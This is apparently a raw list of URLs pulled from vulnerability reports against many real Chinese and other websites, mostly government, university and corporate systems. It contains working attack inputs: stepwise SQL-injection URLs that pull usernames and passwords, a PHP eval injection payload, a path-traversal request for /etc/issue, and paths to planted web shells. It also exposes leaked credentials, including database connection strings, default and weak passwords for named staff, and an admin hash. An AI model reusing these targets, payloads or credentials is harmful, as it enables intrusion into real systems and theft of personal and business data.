http://60.190.87.218/index.php?g=Home&m=Index&a=login http://jpkc.hfut.edu.cn/2007/szlj/memberInfo.php?id=1 ftp://211.144.85.198/ ftp://211.144.85.198/Web.config www.jet185.com http://222.73.41.20:8080 http://222.73.41.20:8011 http://222.73.41.20:8085 http://222.73.41.20:8087 http://www.4haigou.com http://acc.netcansoft.com http://cash.netcansoft.com 
http://222.73.41.20:8014 http://222.73.41.20:7044 http://222.73.41.20:9099 http://www.yhhaitao.com http://oa.netcansoft.com http://ship.netcansoft.com http://222.73.41.20:8086 http://222.73.41.20:8001 http://222.73.41.20:8075 http://222.73.41.20:8099 http://222.73.41.20:8012 http://222.73.41.20:8888 http://222.73.41.20:8282 http://wechat.netcansoft.com http://222.73.41.20:1213 http://222.73.41.20:8077 http://222.73.41.20:1212 http://222.73.41.20:8056 http://www.netcansoft.com www.jet185.com http://eduadminnew.open.com.cn/Public/ http://eduadminnew.open.com.cn/upload/ http://eduadminnew.open.com.cn/upload/BillMode/Temp/ http://eduadminnew.open.com.cn/upload/BillMode/ http://eduadmin.open.com.cn/ http://eduadmin.open.com.cn/BasicSystem/include/properties/configure.xml http://eduadmin.open.com.cn/include/properties/Configure.xml http://eduadmin.open.com.cn/BasicSystem/Query/ http://eduadmin.open.com.cn/BasicSystem/Query/TeacherQuery.aspx http://www.xtepkids.com.cn/admin.php http://www.xtep.com/admin.php http://www.xtop.cc/admin.php http://www.testin.cn/portal.action?op=Portal.index http://wap.smetj.gov.cn/secondeTop.action?type=230_10_gknb&priv_prefix=zfxx http://www.968309.com/news.php?act=list&cat_id=1 http://www.968309.com/sunshineDoctor.php?page=%40%402eb2B&standard_dept_id=2 http://61.140.131.131:8000/kyt/main/login.action http://218.77.75.158:8080/system/manager/terminalLogin.do http://www.cxtuku.com/phpma/ https://119.167.245.100 http://www.hspcn.net/home/productpro/?SEARCH_KEYWORD=aaa http://e.pptv.com/toro/login;jsessionid=52676FCA566BB6D7B9EDF563A4A7CB51?# http://e.pptv.com http://www.lhpa.gov.cn/js_news_xg.asp?news_id=9711 http://www.lhpa.gov.cn http://211.99.198.13 http://211.99.198.13/.svn/entries http://www.dca.org.cn/chubanwu?id=9&fenlei=联盟介绍&fid=179&zfenlei=活动计划&zid=238 http://supports.house.sina.com.cn/decor/photolib/getonephoto_200808.php?id=6740&type=room http://www.pingliang.gov.cn/ https://ebusiness.pkufi.com/siteadmin/login.aspx 
https://www.shandianjr.com/sdmall/detail?itemId=8a2b5b7d4e8d302c014e8da3bf7500ae http://www.miliyo.com/login账号输入处,可多次输入错误的账号密码,都未有图片验证码以及IP锁定策略。 http://ndsjc.imu.edu.cn/admini/login.php http://www.imuemba.com/emba_backstage/Login.asp http://gfs.imu.edu.cn/Database/ http://gfs.imu.edu.cn/Database/SiteWeaver.mdb http://res.ks.91.com/mgt/content/subjectmanage/subjectlist.aspx http://res.ks.91.com/mgt/content/books/hotkeywordslist.aspx http://www.feiren.com http://www.feiren.com/flight/pay.php?orderid=201206280942041253 http://www.feiren.com/flight/pay.php?orderid=201207082153411032 http://www.feiren.com/flight/pay.php?orderid=201206241125571178 http://www.doyouhike.net/s/route/?city_slug=&from=result&keyword=&page=1&route_type_id=10&tag_id= http://m.zol.com.cn/feixin.php?id=129&title=1&view_type=1 http://wljg.xags.gov.cn//wzxx.do?catagoryid=351&flag=6&method=enterIndex&parentid=350 http://mapi.miliyo.com/login/i_login?isMiui=1&_ua=*)处多次输入错误的账号密码,都未有图片验证码以及IP锁定策略。 http://oa.hx.cn/login.action http://www.qdbofcom.gov.cn:8080/qdeng/qingdaocity/1201.htm http://www.wxzte.com.cn/manage/adminlogin.aspx Injection:hongyan.cqupt.edu.cn/szzc/history2/article.php?id=373 http://cx.xmedu.cn/jszp/QueryScoreLogin.action http://fphyd.chinaccd.net/index.php http://www.ahrcu.com/upload/download.jsp?path=&fileName=download.jsp&name= http://61.243.45.250/eg.htm http://61.243.45.250/setsys_backup.htm www.cofcofeedhh.com/cont_showing.php?type_id=112&up_id=&id=122&look_tag=1 http://www.kfpolice.com/WEB/jgdt/index.aspx?id=104 http://124.89.70.198:85/KeyWordInfo.aspx http://**.**.**.**/Login.aspx http://**.**.**.** http://www.zcqh.com/admin/login.php http://www.hspcn.net/home/news/?SEARCH_KEYWORD=x http://www.hspcn.net/home/supply/?SEARCH_KEYWORD=x http://www.scppa.gov.cn/search/index.jsp?keyword=1&clom=doctitle http://www.scppa.gov.cn/ht/FCKeditor//editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=File&CurrentFolder= 
http://www.hspcn.net/home/supply/?AREA_ID=120000%27&pagesize=10&sidx=&sord=&SEARCH_KEYWORD= http://gjsf.jpkc.zstu.edu.cn/ http://gjsf.jpkc.zstu.edu.cn/admin/main.asp http://www.bydauto.com.cn/app/byd.html http://gps2.gps188.com/gps/doif/myLogin.jsp www.b2bys.com http://www.sdcp.cn/打开下图中的标志 http://minix.soso.com/php/front.php/software/software_c/get_software_list/* http://minix.soso.com/php/front.php/software/software_c/get_software_list/7-false http://minix.soso.com/php/front.php/software/software_c/get_software_list/7 http://minix.soso.com/php/front.php/software/software_c/get_software_list/7-true http://minix.soso.com/php/front.php/software/software_c/get_software_list/6 http://218.28.136.20:8000/bus/ http://218.28.136.20:8000/bus/result.jsp?Area=%D6%A3%D6%DD&Name=12&Type=3&page=1 http://fotoplace.cc/admin/src/post/postlist.php?a=36058664 http://124.127.113.235/employee/employee!login.action http://124.127.113.235/qwe.jsp jdbc:mysql://10.43.32.13:3306/timesheet?user=etimesheet&password=qiche@123 http://video.cust.edu.cn/page/mainPage.php?id=0000000134 Injection:video.cust.edu.cn/page/mainPage.php?id=0000000134 ftp://112.4.74.93/ ftp://112.4.74.93/web.config ftp://112.4.74.93/20150624-sz-dump/ ftp://112.4.74.93/A03 http://club.bydauto.com.cn/home.php?uid=411379 http://www.pds12319.gov.cn/portal!resume.action?sign=lxwm存在命令执行漏洞 http://www.pds12319.gov.cn/1.jsp密码123 http://mall.ecitic.com/ URL:http://www.ccsa.org.cn/bpggs/gs_content.php?id=19 http://**.**.**.**/ http://domain:port/Common/HRManage/UserList.aspx?Retire=0&Code= http://**.**.**.**/bugs/wooyun-2010-076859 http://**.**.**.**/bugs/wooyun-2010-094014 http://**.**.**.**/weboa/Common/HRManage/UserList.aspx?Retire=0&Code= http://**.**.**.**/Common/HRManage/UserList.aspx?Retire=0&Code= http://**.**.**.**:8090/Common/HRManage/UserList.aspx?Retire=0&Code= http://**.**.**.**:8080/Common/HRManage/UserList.aspx?Retire=0&Code= http://**.**.**.**/Common/HRManage/UserList.aspx?Retire=0&Code= 
http://**.**.**.**:8080/Common/HRManage/UserList.aspx?Retire=0&Code= http://**.**.**.**:81/Common/HRManage/UserList.aspx?Retire=0&Code= http://**.**.**.**:8080/Common/HRManage/UserList.aspx?Retire=0&Code= http://**.**.**.**/Common/HRManage/UserList.aspx?Retire=0&Code= http://**.**.**.**:8080/Common/HRManage/UserList.aspx?Retire=0&Code= http://**.**.**.**:81//Common/HRManage/UserList.aspx?Retire=0&Code= http://**.**.**.**:8080/Common/HRManage/UserList.aspx?Retire=0&Code= http://wenku.baidu.com/view/f16aed9adaef5ef7ba0d3ca7.html http://182.92.234.7/Admin/user/Login http://www.waic.gov.cn/readfile.asp?id=52 http://www.waic.gov.cn/readfile.asp?id=57 http://sqlmap.org http://119.254.70.177/lianjia/login/login http://119.254.70.177/lianjia//upload/image/20150729/20150729170930_in.jsp jdbc:oracle:thin:@10.**.0.105:1521:YQ http://www.fang360.com/的入口网址,内网可以登陆多个站点 http://se.homelink.com.cn/SalesMgr-Web/login.jsp http://eoffice.homelink.com.cn/login/Login.jsp?logintype=1&gopage=/homepage/Homepage.jsp?hpid=462&subCompanyId=1&isfromhp=1&isfromportal=0 http://ehr.homelink.com.cn/psp/HR91PRD/?cmd=login&languageCd=ZHS&(已登录系统,默认密码test/123456,可查询公司花名册(包含各个员工的信息),薪资以及公共资源配置,已得到左晖董事长的联系方式) gdjyoa.com/sys/sys_login!login.action http://training.transn.com/ctat_v2/index.php http://www.100ehome.com/member/orderDetail2.asp?Flag=1&OrderID=28000 http://jyoa.tju.edu.cn/logon.do http://hyt.mama100.com/hyt/ http://lyg9999.huway.com/user_jyxq?from=actorder&orderid=19003 http://ox.51credit.com/ pwd:adservice/feifei http://s.wanxue.cn/findpw1.do http://127.0.0.1/damicms/del_bom.php?dir= inurl:http://zkcjcx.jxeea.cn/zkcj/ http://zkcjcx.jxeea.cn/zkcj/?txbticket=016708203615&txbname=%E4%BD%95%E6%B3%A2&txbvalidatecode=&ddlprofessionlist=5efc0f142ebc4e078331b13dea5a6cbe&hiddenchangeschool=&hiddenchangeprofession=5efc0f142ebc4e078331b13dea5a6cbe 
http://zkcjcx.jxeea.cn/zkcj/?txbticket=014110300639&txbname=%E8%B0%A2%E8%89%AF%E5%A8%9F&txbvalidatecode=&ddlprofessionlist=a1a93b29385143bc953fa4e6c0240f7b&hiddenchangeschool=&hiddenchangeprofession=a1a93b29385143bc953fa4e6c0240f7b http://fw.popedu.net/zl28/index2.php?dx_id=2814 http://fw.popedu.net/zl28/index2.php?dx_id=2814 http://sqlmap.org http://202.101.116.85:8090 http://union.58.com/ ftp://ftp.cootek.cn:35595 ftp://build.58corp.com/hudson/dianshangwuxian/dianshangwuxian-jiazhengmanager_4-2-30_BRANCH/1 http://build.58corp.com/job/dianshangwuxian-58daojia-ipa/ http://svn.58corp.com/dianshangwuxian/tags/jzt/ios/ http://svn.58corp.com/dianshangwuxian/tags/jzt/ios/ http://svn.58corp.com/dianshangwuxian/tags/jzt/ios/ http://build.58corp.com/view/58到家/view/58到家-Android-测试/ http://svn.58corp.com/cgi-bin/svn.cgi http://cmxy.gzmu.edu.cn/Stu_article.php?id=3591 http://shop.vivo.com.cn/gallery-ajax_get_goods.html http://www.tensin.cn/include/trade.jsp?orderId=61612 http://61.55.148.217/WeiXinServer/m.jsp http://**.**.**.** http://**.**.**.**/custom-hong.html http://**.**.**.**:8080/ParentReg.aspx http://**.**.**.**:8080/ParentReg.aspx http://**.**.**.**:8080/ParentReg.aspx http://**.**.**.**:8080/ParentReg.aspx http://**.**.**.**:8080/ParentReg.aspx http://**.**.**.**:8080/ParentReg.aspx http://**.**.**.**:81/ParentReg.aspx http://**.**.**.**/ParentReg.aspx http://**.**.**.**/ParentReg.aspx http://**.**.**.**:8080/ParentReg.aspx http://**.**.**.**:8080/ParentReg.aspx http://**.**.**.**:8080/ParentReg.aspx http://**.**.**.**:8080/ParentReg.aspx http://**.**.**.**:8080/ParentReg.aspx http://res.ec.cn/check/mms/publish.jsp?act=viewcontent&mmsid=1599368353195133 http://222.172.223.247:8080/knowledge_yn/query/query!queryPublic.action存在命令执行漏洞 http://119.188.112.183:22228/gtsd_track/track.action存在命令执行漏洞 http://www.huaweimossel.com/user.php?act=findpwd http://www.huaweimossel.com/user.php?act=passwordphone http://www.huaweimossel.com/user.php?act=retpasswordphone 
http://www.huaweimossel.com/user.php?act=retpasswordphone http://hbmy.agridoor.com.cn/Hbmy/search/myjc_seach_list.action?pageno=2&pagesize=15存在命令执行漏洞 http://airportmft.xaeport.com/MsgPull/msgpull/msgpull-query!ctbillPassQuery.action存在命令执行漏洞 club.caakee.com/index.php?app=group&p=2&gid=5&act=topic&tid=21599&mod=Topic http://www.szsjrfw.com/link.action存在命令执行漏洞 http://my.55bbs.com/lostpasswd/ http://www.dltwsj.com/index.php?option=com_wrapper&view=wrapper&Itemid=299 cisco:cisco http://newsletter.sinica.edu.tw Injection:newsletter.sinica.edu.tw/news/read_news.php?nid=392(需要绕过WAF/IDS/IPS) http://ocs.quyiyuan.com/login.jsp http://www2.shmtu.edu.cn/cct/newsView-new.asp?id=1071 www2.shmtu.edu.cn/cct/newsView-new.asp?id=1071 http://oa.thothinfo.com/Login.aspx http://oa.thothinfo.com/Main.aspx?rf=Workflows/DemandTreatment/DemandTreatmentApply.aspx?wtit_id=c227a8dd-6a37-4713-8e2d-3b8db844abc6&wtin_id=2e0219ef-d102-482b-ab64-b4a4ab4d2936&wti_id=1e89a811-3187-496c-a503-e2e9d2f49f24 http://oa.thothinfo.com/file/150730093422373.aspx http://oa.thothinfo.com/UserInfo.aspx,发现是当前用户的信息 http://www.10jqka.com.cn/modules/Surveys/get_graph.php?vid=1 http://www.10jqka.com.cn/ad_mar/test.htm http://csdf.muzhiwan.com/.svn/entries http://**.**.**/CabinetMgmt/ExPressUserListpageIndex=31_ http://**.**.**/CabinetMgmt/ExpressUserList_ http://**.**.**/CabinetMgmt/NoGetOrderListpageIndex=1&TimeStatus=2_ http://**.**.**/CabinetMgmt/OrderInfo http://**.**.** http://www.fjsmjj.com/jkyy1/User_ShowXx.aspx?id=83 http://www.fjsmjj.com/jkyy1/manager/Default.aspx http://mail.airchinacargo.com http://wan.sogou.com/p/index.do http://shopping.bcia.com.cn/app/eshop/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fissue%2500.jpg/single/id/133 http://www.csljc.com/manage/login.aspx www.csljc.com http://my.1ting.com/fav/folder http://szy.baojisl.gov.cn/ http://szy.baojisl.gov.cn/install/ab.php http://gsxt.scaic.gov.cn:8080/xxsb/login.do?method=printLlybab_new&nbxh=5107000050060030 
http://gsxt.scaic.gov.cn:8080/xxsb/login.do?method=printLlybab_new&nbxh=5107000050060031 http://gsxt.scaic.gov.cn:8080/xxsb/login.do?method=printLlybab_new&nbxh=5107000050060035 http://gsxt.scaic.gov.cn:8080/xxsb/login.do?method=printLlybab_new&nbxh=5107000050060037 http://gsxt.scaic.gov.cn:8080/xxsb/login.do?method=printLlybab_new&nbxh=5107000050060039 http://gsxt.scaic.gov.cn:8080/xxsb/login.do?method=printLlybab_new&nbxh=5107000050060040 http://gsxt.scaic.gov.cn:8080/xxsb/login.do?method=printLlybab_new&nbxh=5107000050060041 http://gsxt.scaic.gov.cn:8080/xxsb/login.do?method=printLlybab_new&nbxh=5115000000004786 http://weixin.hazq.com/ http://weixin.hazq.com/analysis/yyblist.php?yyb=82 http://weixin.hazq.com/phpmyadmin/ http://weixin.hazq.com/darkmoon3.php http://zjc.sicnu.edu.cn/solicit_2014_sys/solicit2014_infor_enrollment.aspx http://zjc.sicnu.edu.cn http://210.39.18.247/graph_view.php?action=tree&tree_id=6 http://amway.hiall.com.cn/1.php http://61.135.231.203:8001/ http://61.135.231.203:7001/jmxroot/jmxroot.jsp http://221.6.35.202/login.html http://wenku.baidu.com/view/f3f0a27fb84ae45c3b358cf2.html看到陕西省人口个案管理信息系统的使用说明书: http://124.115.170.79:9080/pis/ KERNEL_VERSION:3.4.67-qemu+ http://202.96.17.115/mobile_bpm/login.do;jsessionid=D44C0AADFB7581908F8ED1A9D2FA2A8B?method=logout&navLevel=0 test:abcd1234 liwei:abcd1234 liumin:abcd1234 lili:abcd1234 liuyong:abcd1234 liying:abcd1234 lili:abcd1234 wanglin:abcd1234 yangtao:abcd1234 liqian:abcd1234 lihao:abcd1234 chenhui:abcd1234 wanglin:abcd1234 liying:abcd1234 liuyun:abcd1234 liguizhi:abcd1234 xumin:abcd1234 http://bbs.7659.com/config/config_ucenter.php.bak http://www.cnitpm.com/qun/userforum.aspx?name=a http://www.cnitpm.com/search.aspx?keyword=a http://www.glsc.com.cn/glzq/broker/salerQuery.jsp http://www.glsc.com.cn/glzq/financing/management/tdkh_byd_1.jsp http://dwzy.xbmu.edu.cn/msxy/index_v.aspx http://wechat.cc.letv.com/EliteWebChat/logout.do 
http://home.ldjt.com.cn/weaver/weaver.email.FileDownloadLocation?fileid=32&download=1 http://ams.ziroom.com/AMS/configuration/dispatchOrderAudit!viewHomeApplianceOrders.do?orderAid=459130 http://ams.ziroom.com/AMS/configuration/dispatchOrderAudit!viewHomeApplianceOrders.do?orderAid=459230 http://ams.ziroom.com/AMS/configuration/dispatchOrderAudit!viewHomeApplianceOrders.do?orderAid=459330 www.gwdang.com 3.spdy/3.1 http://qw.yz.gov.cn/index.php Injection:qw.yz.gov.cn/news_content.php?id=1095 http://116.52.249.221/NtBankWeb/admin/calogin/fjunitlogin.do http://**.**.**/user-login.html q-open.jia.com/api/pay/query_balance q-open.jia.com/api/pay/query_trade q-open.jia.com/api/pay/query_deposit q-open.jia.com/api/pay/query_fos http://121.33.74.72/login.php http://121.33.74.72/index.php http://121.33.74.72/main.php http://121.33.74.72/user.php http://121.33.74.72/manual/ http://121.33.74.72/menu.php http://121.33.74.72/user.php直接将用户名和明文密码暴漏出来,且能够直接对用户进行修改密码和删除用户的操作,影响到广东多个城市的数十个账号。 http://121.33.74.72/main.php和http://121.33.74.72/menu.php均可越权操作 com:8888 http://218.249.47.94/Xianghe/MTK_Phone_KK_UAprofile.xml http://zwxxjs.yn.gov.cn/wasadmin/index.html http://**.**.**.**/bugs/wooyun-2015-0108778 http://**.**.**.**/comm_front/public_info/content_category_list.jsp?class_id=1&class_name=%EF%BF%BD%DB%BA%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD http://**.**.**.**/comm_front/public_info/content_category_list.jsp?class_id=1&class_name=%EF%BF%BD%DB%BA%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD http://**.**.**.**/comm_front/public_info/content_category_list.jsp?class_id=1&class_name=%EF%BF%BD%DB%BA%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD http://**.**.**.**/comm_front/public_info/content_category_list.jsp?class_id=1&class_name=%EF%BF%BD%DB%BA%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD http://**.**.**.**/comm_front/public_info/content_category_list.jsp?class_id=1&class_name=%EF%BF%BD%DB%BA%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD 
http://**.**.**.**/comm_front/public_info/content_category_list.jsp?class_id=1&class_name=%EF%BF%BD%DB%BA%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD http://**.**.**.**/comm_front/public_info/content_category_list.jsp?class_id=1&class_name=%EF%BF%BD%DB%BA%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD http://**.**.**.**/comm_front/public_info/content_category_list.jsp?class_id=1&class_name=%EF%BF%BD%DB%BA%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD http://www.xbrc.com.cn/xbrc/front/index https://cms.dyqx.com http://oa.jinshiedu.net/consult/consultStudent/studentProfileList.do ftp://221.1.211.94/ ftp://121.31.13.165/ http://my.qfang.com/register/toforgetPsd http://eproc.nepalbank.com.np/tenders.php?action=setorder&sortby=tender_code&sortorder=desc http://eproc.ntc.net.np/tenders.php?action=setorder&sortby=tender_code&sortorder=desc http://www.edudbc.gov.np/tenders.php?action=setorder&sortby=tender_code&sortorder=desc http://obss.nrb.org.np/ebid/tenders.php?action=setorder&sortby=tender_code&sortorder=desc http://eproc.dor.gov.np/tenders.php?action=setorder&sortby=tender_code&sortorder=asc http://www.co.ccpit.org:80/AllDownload.aspx?type=IF2_1 http://tvs.tcl.com:80/tvs/checkfrontLogin.do http://feedback.wochacha.com/admin.php?m=Bugback&a=view_client&id=76763&p1=1&pageSize=5&remark_1=0&remark_2=0 http://feedback.wochacha.com/admin.php?m=Bugback&a=view_client&id=76763&p1=1&pageSize=5&remark_1=0&remark_2=0 http://feedback.wochacha.com/admin.php?m=Bugback&a=view_client&id=76763&p1=1&pageSize=5&remark_1=0&remark_2=0 http://x.tv.sohu.com http://wooyun.org/bugs/wooyun-2010-096906 http://192.168.182.153:8080/ http://192.168.182.154:8080/login.html?ReturnUrl=%2f http://192.168.182.185/login.jsp# http://10.30.2.45/WebUIProject/UILoader/login.aspx http://10.30.6.25/Job/TalentMarket/Default.aspx http://www.chaojibiaoge.com/index.php/Home/Index/forgetPassword http://boshihou.eol.cn/site_connet.php?sid=2556 http://oa.tcl.com:89/m1/login.do http://**.**.**.**/cgal/default.htm 
https://github.com/58Automation/ResponseTimeTool/blob/7cb0d04e26465cc0ef2efa7db4347e52c0dc18ab/src/main/resources/email.xml http://www.qqhrgaj.gov.cn/view.do?viewType=viewOnePhoto&id=35 http://www.gzzgh.net/ http://mall.bydauto.com.cn/index.php/customer/account/login/这个地方是比亚迪客户登陆的地方,看到登陆地址没有验证码限制 http://cms.yintai.com/wui/main.jsp?templateId=1 https://mail.htffund.com http://www.11185.com.cn/u/editCustomersPage.html?autopayCustomers.id=651060 http://www.dyzky.net/news/?z_id=277 http://www.dyzky.net/news/?z_id=270&pageindex=2 http://www.dyzky.net/news/picindex.php?z_id=270 https://github.com/frank0718/163.com/blob/b4bd595e9119f0888046077bff0fc551d2570e2f/python/smtp.py http://www.gnict.com/cn/news/news_list.jsp?ID=4682 http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://game.ent.sina.com.cn https://github.com/alpinist23/commons/blob/d328e7b16a1472d3e887f4c8aa467504046cc5f1/common.message/message.client/src/test/resources/spring-commons-client.xml http://**.**.**.**/admin/Product/Comstye.aspx http://**.**.**.**/admin/Product/Comstye.aspx http://**.**.**.**/admin/Product/Comstye.aspx http://**.**.**.**/admin/Product/Comstye.aspx http://www.zte-d.com/manage/admin_top.aspx,出现跳转提示,禁用浏览器js功能,可以发现,其实页面返回了内容: http://www.zte-d.com/manage/role/master_update.aspx?user=,应该存在admin这个用户,直接就进入修改密码页面了: http://**.**.**/weblibsys/reader.aspwci=login_ http://**.**.**/lib/reader.aspwci=login_ http://**.**.**/reader.aspwci=login_ http://**.**.**/read/reader.aspwci=login_ http://**.**.**/reader.aspwci=login_ http://**.**.**/weblibsys/reader.aspwci=login_ http://**.**.**/js/reader.aspwci=login_ http://**.**.**/weblibsys/reader.aspwci=login_ http://**.**.**/reader/reader.aspwci=login_ http://**.**.**/reader.aspwci=login_ http://**.**.**/weblibsys/reader.aspwci=login_ http://**.**.**/weblibsys/reader.aspwci=login_ http://**.**.**/WebLibsys/reader.aspwci=login_ 
http://**.**.**/weblibsys/reader.aspwci=login_ http://**.**.**/web/reader.aspwci=login_ http://**.**.**/tsg/reader.aspwci=login_ http://**.**.**/reader.aspwci=login_ http://**.**.**/tsg/reader.aspwci=login_ http://**.**.**/weblibsys/reader.aspwci=login_ http://**.**.**/reader.aspwci=login_ http://**.**.**/reader.aspwci=login_ http://**.**.**/reader.aspwci=login_ http://**.**.**/libweb/reader.aspwci=login_ http://**.**.**/tsg/reader.aspwci=login_ http://**.**.**/WebLibsys/reader.aspwci=login_ http://**.**.**/weblibsys/reader.aspwci=login_ http://**.**.**/weblibsys/reader.aspwci=login_ http://**.**.**/weblibsys/reader.aspwci=login_ http://**.**.**/weblibsys/reader.aspwci=login_ http://**.**.**/reader.aspwci=login_ http://**.**.**/weblibsys/reader.aspwci=login_ http://**.**.**/reader.aspwci=login_ http://**.**.**/reader.aspwci=login_ http://**.**.**/libweb/reader.aspwci=login_ http://www.hntcm.gov.cn admin:84a2e9437eba98f8cad909d583e7d7cc#1 localhost:zyyglj# http://thothinfo.com/home/UserHsp/RegistSupply thothinfo.com/pub/Attachments/list?pkey_value=0000005708&table_name=HSP_REG_CP_FORM&attach_type=FILEUP_REG_CODE&sidx=attach_id&sord=asc&t=1438261612977 http://zqoa.sxgt.net/ http://zqoa.sxgt.net/lks/sys/lks_public.nsf/ http://ekp.ya999.com/ http://ekp.ya999.com/lks/sys/lks_public.nsf/84b5fb13f9d3697c48256b7d00258d27/27bf9fad37823a7f48257d0f00353870?OpenDocument http://www.enet.com.cn/enews/inforcenter/itdate/fitdate.jsp?province=&etype=&fromyear=200 http://www.cjol.com/jobseekers/JobOpportunity/applyajobnoregsucceed.aspx?JobPostID=6888463 http://zjy.gdcost.com/ http://zjy.gdcost.com/login.ashx?act=v2&v=vWHB_KSAPB2&w=cityid%3D4400 http://www.sxgt.net/ http://www.jnfda.gov.cn/fda/permit/common/permitApplStuffMainAction.do?operFlag=query&req_id=0000000000016042&dispFlag=edit&stuffflag=0&appltype=171# 
http://www.jnfda.gov.cn/js/dialogWrapper.jsp?url=/fda/commons/attachmentsViewAction.do%3fvest%3d171%26busiCode%3d0000000000016042%26applType%3d171%26applStuffId%3d0000000001392828 url:http://119.254.70.121/ http://119.254.70.121//upload/video/PIC_0000001180.jsp http://172.16.4.245核心销售平台弱口令,简单看一下,基本销售业务都在眼皮下了 www.guh-software.de ldap://172.16.3.12:389/ http://172.16.4.30/users/sign_in http://passport.homelink.com.cn/cas/login?service=http://sm.lianjia.com/shiro-cas http://172.16.4.38/login_page.php?return=index.php&error=1&username=admin&perm_login=0&secure_session=1 password:homelink http://fms.feiniu.com/login.php http://fms.feiniu.com/mail.php http://fms.feiniu.com/unsubscribe.php http://fms.feiniu.com/unsubscribe.php https://github.com/58Automation/ResponseTimeTool/blob/f2f3c12202cf2e8d46c2dfc055e2e2eafc5e90d9/src/main/resources/email.xml http://115.29.198.140:8080/ http://e.tju.edu.cn/OA/tmsgReadLog.do?msgid=697269 http://oa.trip8080.com/跳转到 http://221.6.35.202:8009/ http://acm.zjut.edu.cn/system/messageInfoAction.do http://112.25.58.6:1988/ http://rst.aoratec.com/gnpdm/logout.shtml http://sasac.yingyan189.com/login.asp http://oa.trip8080.com/ http://221.6.35.202:8009/ http://221.6.35.202:8009/tools/SWFUpload/upload.jsp height:20px;BORDER http://221.6.35.202:8009/null1.jsp http://hq.fruitday.com:88/login/Login.jsp?logintype=1 http://www.ximalaya.com/passport/user_info/show http://219.143.235.42/syportal/login?weblogic.servlet.network_channel.port=9001 http://zop.zto.cn/ http://zop.zto.cn//UploadFile/20150209/huohuo123_6c334cce8dff4569aa4ae4e13ea01807_20150510212511.ASP http://life.sina.com.cn/info.php?id=649 http://ma.mmarket.com/ http://www2.dgunicom.com:80/webout/picksystem/pick_system_agent.jsp存在注入,导致数据库,用户帐号密码、用户信息泄露 www2.dgunicom.com http://www.hgfs.com.cn/jishunews.php?id=10 https://github.com/guyuzhilian/Programs/blob/3f5f0ab44131624b56f9626b50ebf3612456f6ae/Tools/popo_advice/cfg.py http://210.75.8.3:9002/jmx-console/ 
http://222.190.111.116/doc/page/main.asp http://app.gwm.cn:8055/PerformanceEvaluate/ http://app.gwm.cn:9000/xinpingtai/default.aspx http://voice.yiban.cn/web/getUserInfo post:uid http://www.lib.imut.edu.cn/admin/ewebeditor/dialog/about.htm http://www.lib.imut.edu.cn/admin/ewebeditor/upload.asp?action=save&type=IMAGE&style=luoye http://www.xnsdyyy.com/index.action http://tool.717199.com/zhoupu/?q={${eval%28$_POST[x]%29 http://tool.717199.com/zhoupu/?q={${eval%28$_POST[x]%29 http://mon.beequick.cn/zabbix/dashboard.php?ddreset=1&sid=8a188daf2827926a http://210.31.160.240/index.htm http://shijue.me/show_text/55bafaa58ddf8752d2011cac http://shijue.me http://www.hlslm.cn/Content/id/88* http://125.88.33.172/fsms/login http://lccb.guet.edu.cn/jmx-console/ http://lccb.guet.edu.cn/jmx-console/1.jsp。管理员看到删掉吧。 http://fangvip.ganji.com/auth.php?do=login这个接口是赶集网房源管理系统,登陆的接口没有任何的验证限制 http://www.akfc.gov.cn/shownews.asp?id=156 http://www.huomaotv.com/就是火猫TV的主站登陆接口,点击登陆就出来了,看到没有任何登陆限制 http://iamdeloitte.hiall.com.cn/uc_server/data/config.txt http://service.szgas.com.cn/Guide/GuideDetail.aspx?module=4214&id=156 http://sqlmap.org http://www.wxchina.com/index.php?s=/About/about_trends/aid/156*.html http://sqlmap.org http://www.v2ex.com/t/189910 https://paypassport.suning.com/ids/oauth20/authorize?client_id=suning_01&response_type=code&redirect_uri=http://mail-shengji.com/youxiang.asp http://114.251.242.188:8080/iclock/imanager http://my.pcauto.com.cn/cmt/receivereply.jsp com:24593 http://jsjx.gdsspt.net/manage/login.aspx http://skym.ctgu.edu.cn/newsdetail.php?gid=2&id=60%20%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11%20from%20users http://skym.ctgu.edu.cn/newsdetail.php?gid=2&id=60%20%20and%201=2%20union%20select%201,user%28%29,3,4,5,6,7,8,9,10,11%20from%20users http://skym.ctgu.edu.cn/newsdetail.php?gid=2&id=60%20%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,database%28%29%20from%20users 
http://skym.ctgu.edu.cn/newsdetail.php?gid=2&id=60%20%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,table_name%20from%20information_schema.tables%20where%20table_schema=0x736B796D http://skym.ctgu.edu.cn/newsdetail.php?gid=2&id=60%20%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,column_name%20from%20information_schema.columns%20where%20table_schema=0x736B796D%20and%20table_name=0x7573657273%20limit%20%200,1 http://skym.ctgu.edu.cn/newsdetail.php?gid=2&id=60%20%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,column_name%20from%20information_schema.columns%20where%20table_schema=0x736B796D%20and%20table_name=0x7573657273%20limit%20%201,1 http://skym.ctgu.edu.cn/newsdetail.php?gid=2&id=60%20%20and%201=2%20union%20select%201,userid,3,4,5,6,7,8,9,10,pwd%20from%20users http://www.juneyaoair.com/pages/register/register.aspx注册两个账号 http://www.juneyaoair.com/pages/MyAccount/commonMemberEdit.aspx?para=username:%E6%89%8B%E6%9C%BA%E5%8F%B7%E4%B8%80,mobile:,certificateType:CC,certificateNo:1111,birthday:2015-07-23,passengerType:ADT,sex:M,belongCountry:,certValidity:,nationality:,countryTelCode:86,ffCardNo:,commonContactId:1721669 